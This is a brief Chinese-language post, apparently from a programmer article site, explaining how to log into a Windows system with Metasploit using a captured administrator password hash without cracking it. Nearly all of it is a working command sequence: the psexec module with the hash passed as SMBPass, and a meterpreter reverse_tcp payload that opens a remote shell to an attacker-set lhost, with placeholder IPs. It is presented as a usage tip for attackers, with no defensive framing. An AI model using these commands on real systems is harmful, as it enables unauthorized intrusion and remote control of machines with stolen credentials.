欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

Metasploit使用hash直接登录系统

程序员文章站 2022-06-28 09:34:09
其实Metasploit 早就被Rapid7收购了,好像没什么人知道,呵呵,Metasploit 专业版就是收购后发布出来的。 抓到管理员的密码hash根本不用破解,...

其实Metasploit 早就被Rapid7收购了,好像没什么人知道,呵呵,Metasploit 专业版就是收购后发布出来的。

抓到管理员的密码hash根本不用破解,直接就可以登录。

use windows/smb/psexec

set SMBUser akast

set SMBPass 用户密码的hash值

set payload Windows/meterpreter/reverse_tcp

set rhost 333.333.333.333

set lhost 111.111.111.111

exploit

Metasploit使用hash直接登录系统